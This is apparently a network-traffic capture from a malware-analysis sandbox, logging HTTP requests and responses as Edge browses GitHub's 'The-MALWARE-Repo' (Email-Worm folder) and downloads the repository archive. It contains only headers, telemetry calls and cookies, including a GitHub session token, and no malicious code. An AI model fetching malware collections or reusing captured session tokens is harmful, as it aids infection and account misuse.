access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003518
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23FE1E:313001:67D0F330
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1270
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:40 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003177
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:240A09:31406A:67D0F330
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1108
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:41 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003277
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:240AC5:31415F:67D0F338
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:41 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002144
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:240AE7:314190:67D0F339
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1395
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:45 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003289
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:241129:314A41:67D0F339
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1465
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:45 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003362
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:24113B:314A55:67D0F33D
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1465
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:49 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003203
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:2417AC:315339:67D0F33D
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2577
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:54 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002117
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:241FA8:315DB0:67D0F341
GET

https://github.githubassets.com/favicons/favicon.svg

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /favicons/favicon.svg HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/svg+xml
content-md5: bYAvaN8MCaSZfP0o7q/Z/w==
last-modified: Wed, 14 Aug 2024 19:18:58 GMT
etag: "0x8DCBC95F2647EDF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 62
x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 882833, 4
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3fa3f5f5115cccb77d75b5a566220ff6613b08ac
content-length: 959
GET

https://github.githubassets.com/favicons/favicon.png

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /favicons/favicon.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/png
content-md5: NG4JRxNi8pB1EKMYEhKc0g==
last-modified: Wed, 14 Aug 2024 19:18:46 GMT
etag: "0x8DCBC95EB57AC96"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 154
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 4896225, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 638733b60d56054788b7114fcbca10cbcfe1235d
content-length: 958
GET

https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: image/png
content-md5: YDrNCDxuYozaAYS2sPzvIQ==
last-modified: Wed, 14 Aug 2024 19:49:39 GMT
etag: "0x8DCBC9A3C0EF02F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:06 GMT
age: 2979778
x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600071-LCY
x-cache: HIT, HIT
x-cache-hits: 381, 6908
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7dc53411dd04147aa879ecfca70b957222fe6854
content-length: 14426
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 5872
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Wed, 12 Mar 2025 02:35:06 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1741750506
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 3FC2:10FA91:4DA8DC:607D46:67D0F2DA
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 926
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Wed, 12 Mar 2025 02:35:13 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1741750513
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 3FC2:10FA91:4DAB35:60806B:67D0F2DA
GET

https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master

msedge.exe

Remote address:

20.26.156.216:443

Request

GET /Da2dalus/The-MALWARE-Repo/zip/refs/heads/master HTTP/2.0
host: codeload.github.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

access-control-allow-origin: https://render.githubusercontent.com
content-disposition: attachment; filename=The-MALWARE-Repo-master.zip
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/zip
cross-origin-resource-policy: cross-origin
etag: W/"c78eabe799ca0e23e77f67470f9246428233eb97f9aed155e647cd52729d1523"
strict-transport-security: max-age=31536000
vary: Authorization,Accept-Encoding,Origin
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
date: Wed, 12 Mar 2025 02:35:13 GMT
x-github-request-id: 446F:1E1C98:18979:7647E:67D0F2E0
GET

https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html, application/xhtml+xml, application/json
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
x-react-app-name: repos-overview
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:50 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"95f71446ad604f95bebcc6dc823958d1"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
x-html-safe: 551b05c23e87c25fdef8ecb9d40da50bde042bdda1be77488139e3bdfe555a1d
x-github-request-id: 06D8:75CAE:25DBD7:30942D:67D0F304
GET

https://github.com/Da2dalus/The-MALWARE-Repo/latest-commit/master/Email-Worm

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/latest-commit/master/Email-Worm HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:50 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"3b1ec0bc5e0864a5815defaffc90db22"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com 